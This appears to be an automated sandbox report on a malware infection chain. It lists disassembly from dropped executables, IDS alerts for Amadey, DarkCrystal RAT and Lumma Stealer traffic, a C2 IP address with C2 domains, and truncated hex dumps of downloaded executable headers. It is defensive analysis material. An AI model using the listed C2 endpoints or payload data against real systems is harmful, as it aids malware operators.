Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+14h]	11_2_0006DA3A
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+317AB538h]	11_2_0006DA3A
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then lea eax, dword ptr [ecx-6C0B83CEh]	11_2_0006D780
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_00071822
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+5Dh]	11_2_0006DC9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	11_2_000900B0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-000000FEh]	11_2_000AD0C0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	11_2_000AC8C0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-38B2FA5Ch]	11_2_00092120
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_00092120
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+12h]	11_2_0006C130
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-25088CECh]	11_2_00072130
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	11_2_000AD960
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	11_2_0006E174
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-000000B2h]	11_2_00070994
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	11_2_000AC1D0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-313E762Ah]	11_2_000ABA40
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	11_2_000A8240
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+08h]	11_2_000A8240
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6C0B83D6h]	11_2_000A8240
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2Ch]	11_2_00090650
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-52h]	11_2_00090670
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	11_2_00093EE0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+12EB444Ah]	11_2_0006FB20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then mov ebp, eax	11_2_00068B21
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then mov ebp, edx	11_2_000AC320
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then jmp eax	11_2_0006F769
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+02h]	11_2_00071368
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	11_2_0007A370
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+62h]	11_2_00072F82
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	11_2_0006A390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	11_2_0006A390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_0008CBB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49696 -> 176.113.115.6:80
Source: Network traffic	Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.6:49728 -> 37.230.113.179:80
Source: Network traffic	Suricata IDS: 2060418 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online) : 192.168.2.6:51447 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060424 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life) : 192.168.2.6:58822 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060416 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life) : 192.168.2.6:61338 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun) : 192.168.2.6:59094 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060412 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today) : 192.168.2.6:53681 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060414 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top) : 192.168.2.6:51971 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060422 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun) : 192.168.2.6:53980 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.6:50814 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 176.113.115.6

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:57:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 09 Mar 2025 15:29:56 GMTETag: "1c8000-62fea87283677"Accept-Ranges: bytesContent-Length: 1867776Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 90 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 49 00 00 04 00 00 66 82 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 d2 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 00 06 00 00 02 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 e4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 20 06 00 00 02 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 79 7a 65 6d 6f 61 00 70 19 00 00 10 30 00 00 70 19 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 69 66 78 68 65 7a 61 00 10 00 00 00 80 49 00 00 06 00 00 00 58 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 49 00 00 22 00 00 00 5e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:57:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 06:29:01 GMTETag: "128200-62ff71680a71b"Accept-Ranges: bytesContent-Length: 1212928Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb 8e cd 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 06 00 00 f0 00 00 00 00 00 00 32 94 04 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 12 00 00 08 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 e6 06 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 07 00 40 45 00 00 00 50 07 00 20 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 aa 06 00 18 00 00 00 68 6f 06 00 c0 00 00 00 00 00 00 00 00 00 00 00 7c e7 06 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 48 06 00 00 10 00 00 00 4a 06 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c a0 00 00 00 60 06 00 00 a2 00 00 00 52 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 10 07 00 00 16 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 40 07 00 00 02 00 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 20 34 00 00 00 50 07 00 00 36 00 00 00 0c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 7e 05 00 00 90 07 00 00 7e 05 00 00 42 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 7e 05 00 00 10 0d 00 00 7e 05 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:57:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 12:00:49 GMTETag: "7e800-62ffbb91b8a07"Accept-Ranges: bytesContent-Length: 518144Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 95 d1 ce 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 e0 07 00 00 10 00 00 00 c0 21 00 00 9e 29 00 00 d0 21 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 29 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 40 16 00 6c 00 00 00 74 b3 29 00 94 01 00 00 00 b0 29 00 74 03 00 00 00 80 17 00 00 32 01 00 00 00 00 00 00 00 00 00 08 b5 29 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 a9 29 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 16 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 21 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 e0 07 00 00 d0 21 00 00 de 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 10 00 00 00 b0 29 00 00 06 00 00 00 e2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:57:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 15:31:30 GMTETag: "b4e00-62ffeaa912f6b"Accept-Ranges: bytesContent-Length: 740864Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 68 d9 1f 60 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 14 0b 00 00 36 00 00 00 00 00 00 6e 32 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0b 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 20 32 0b 00 4b 00 00 00 00 60 0b 00 78 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 12 0b 00 00 20 00 00 00 14 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 0f 00 00 00 40 0b 00 00 10 00 00 00 18 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 23 00 00 00 60 0b 00 00 24 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0b 00 00 02 00 00 00 4c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:57:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 15:33:00 GMTETag: "154e00-62ffeaff62554"Accept-Ranges: bytesContent-Length: 1396224Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 31 b3 ce 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 7a 08 00 00 fe 00 00 00 00 00 00 52 c4 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 06 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 16 09 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 09 00 40 45 00 00 00 80 09 00 d4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 db 08 00 18 00 00 00 98 9f 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 ac 17 09 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 78 08 00 00 10 00 00 00 7a 08 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c a0 00 00 00 90 08 00 00 a2 00 00 00 80 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 40 09 00 00 16 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 70 09 00 00 02 00 00 00 38 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 42 00 00 00 80 09 00 00 44 00 00 00 3a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8c 0b 00 00 d0 09 00 00 8c 0b 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:57:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 16:35:20 GMTETag: "65c200-62fff8ed90a20"Accept-Ranges: bytesContent-Length: 6668800Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 37 1b ac e2 73 7a c2 b1 73 7a c2 b1 73 7a c2 b1 62 fc c1 b0 72 7a c2 b1 38 02 c3 b0 76 7a c2 b1 73 7a c3 b1 6b 7a c2 b1 8b fd c7 b0 72 7a c2 b1 8b fd 3d b1 72 7a c2 b1 73 7a 55 b1 72 7a c2 b1 8b fd c0 b0 72 7a c2 b1 52 69 63 68 73 7a c2 b1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e8 0f cf 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2b 00 8e 62 00 00 3a 03 00 00 00 00 00 80 16 00 00 00 10 00 00 00 a0 62 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 65 00 